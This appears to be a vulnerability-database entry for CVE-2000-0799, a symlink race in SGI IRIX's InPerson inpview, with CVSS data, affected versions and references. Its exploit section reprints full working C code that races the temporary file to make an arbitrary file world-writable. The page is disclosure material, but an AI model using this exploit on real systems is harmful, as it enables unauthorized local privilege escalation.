CVE-2000-0799
CVSS3.7
发布时间 :2000-10-20 00:00:00
修订时间 :2008-09-05 16:21:54
NMCOES    

[原文]inpview in InPerson in SGI IRIX 5.3 through IRIX 6.5.10 allows local users to gain privileges via a symlink attack on the .ilmpAAA temporary file.


[CNNVD]IRIX inpview竞争条件漏洞(CNNVD-200010-105)

        SGI IRIX 5.3版本到IRIX 6.5.10版本中InPerson的inpview存在漏洞。本地用户可以借助对.ilmpAAA暂时文件的符号连接攻击来提升特权。

- CVSS (基础分值)

CVSS分值: 3.7 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sgi:irix:6.5.8SGI IRIX 6.5.8
cpe:/o:sgi:irix:6.5.4SGI IRIX 6.5.4
cpe:/o:sgi:irix:6.5.3fSGI IRIX 6.5.3f
cpe:/o:sgi:irix:6.5.3mSGI IRIX 6.5.3m
cpe:/o:sgi:irix:6.5.6SGI IRIX 6.5.6
cpe:/o:sgi:irix:6.5.3SGI IRIX 6.5.3
cpe:/o:sgi:irix:6.5.2mSGI IRIX 6.5.2m
cpe:/o:sgi:irix:6.5.1SGI IRIX 6.5.1
cpe:/o:sgi:irix:6.5SGI IRIX 6.5
cpe:/o:sgi:irix:6.5.7SGI IRIX 6.5.7

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0799
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0799
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-105
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/templates/archive.pike?list=1&msg=200008021924.e72JOVs12558@ix.put.poznan.pl
(VENDOR_ADVISORY)  BUGTRAQ  20000802 [LSD] some unpublished LSD exploit codes
http://www.securityfocus.com/bid/1530
(VENDOR_ADVISORY)  BID  1530
http://xforce.iss.net/static/5065.php
(UNKNOWN)  XF  irix-inpview-symlink(5065)
ftp://patches.sgi.com/support/free/security/advisories/20001101-01-I
(UNKNOWN)  SGI  20001101-01-I

- 漏洞信息

IRIX inpview竞争条件漏洞
低危 竞争条件
2000-10-20 00:00:00 2005-05-02 00:00:00
本地  
        SGI IRIX 5.3版本到IRIX 6.5.10版本中InPerson的inpview存在漏洞。本地用户可以借助对.ilmpAAA暂时文件的符号连接攻击来提升特权。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:vuldb@securityfocus.com.

- 漏洞信息 (20130)

IRIX 6.5.x inpview Race Condition Vulnerability (EDBID:20130)
irix local
2000-01-01 Verified
0 Last Stage of Delirium
N/A [点击下载]
source: http://www.securityfocus.com/bid/1530/info

Certain versions of IRIX ship with a version of inpview that creates files in '/var/tmp/' in an insecure manner and is therefore prone to a race condition.

InPerson's 'inpview' is a networked multimedia conferencing tool. InPerson provides multiway audio and video conferencing with a shared whiteboard, combined into a single, easy-to-use application. You use a separate "phone" tool to place and answer calls.

The 'inpview' program writes out temporary files in the '/var/tmp' directory. Because these filenames are not random, an attacker can create a symlink to a previously created filename and force the SUID 'inpview' to overwrite the file with 'rw-rw-rw' permissions. 

                /*## copyright LAST STAGE OF DELIRIUM jan 2000 poland        *://lsd-pl.net/ #*/
                /*## /usr/lib/InPerson/inpview                                               #*/

                /*   sets rw-rw-rw permissions                                                */

                #include <sys/types.h>
                #include <dirent.h>
                #include <stdio.h>

                main(int argc,char **argv){
                    DIR *dirp;struct dirent *dentp;

                    printf("copyright LAST STAGE OF DELIRIUM jan 2000 poland  //lsd-pl.net/\n");
                    printf("/usr/lib/InPerson/inpview for irix 6.5 6.5.8 IP:all\n\n");

                    if(argc!=2){
                        printf("usage: %s file\n",argv[0]);
                        exit(-1);
                    }

                    if(!fork()){
                        nice(-20);sleep(2);close(0);close(1);close(2);
                        execle("/usr/lib/InPerson/inpview","lsd",0,0);
                    }

                    printf("looking for temporary file... ");fflush(stdout);
                    chdir("/var/tmp");
                    dirp=opendir(".");
                    while(1){
                        if((dentp=readdir(dirp))==NULL) {rewinddir(dirp);continue;}
                        if(!strncmp(dentp->d_name,".ilmpAAA",8)) break; 
                    }
                    closedir(dirp);
                    printf("found!\n");
                    while(1){
                        if(!symlink(argv[1],dentp->d_name)) break;
                    }
                    sleep(2);
                    unlink(dentp->d_name);

                    execl("/bin/ls","ls","-l",argv[1],0);
                }
		

- 漏洞信息

1486
IRIX inpview .ilmpAAA Symlink Local Privilege Escalation
Local Access Required Race Condition
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified, Uncoordinated Disclosure

- 漏洞描述

- 时间线

2000-08-02 Unknow
Unknow Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

IRIX inpview Race Condition Vulnerability
Race Condition Error 1530
No Yes
2000-08-02 12:00:00 2007-07-14 11:06:00
This vulnerability was posted to the Bugtraq mailing list by LSD <contact@lsd-pl.net> (Last Stages of Delirium) on August 2, 2000.

- 受影响的程序版本

SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.4
SGI IRIX 6.5.3 m
SGI IRIX 6.5.3 f
SGI IRIX 6.5.3
SGI IRIX 6.5.2 m
SGI IRIX 6.5.1
SGI IRIX 6.5

- 漏洞讨论

Certain versions of IRIX ship with a version of inpview that creates files in '/var/tmp/' in an insecure manner and is therefore prone to a race condition.

InPerson's 'inpview' is a networked multimedia conferencing tool. InPerson provides multiway audio and video conferencing with a shared whiteboard, combined into a single, easy-to-use application. You use a separate "phone" tool to place and answer calls.

The 'inpview' program writes out temporary files in the '/var/tmp' directory. Because these filenames are not random, an attacker can create a symlink to a previously created filename and force the SUID 'inpview' to overwrite the file with 'rw-rw-rw' permissions.

- 漏洞利用

The following exploit is available:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站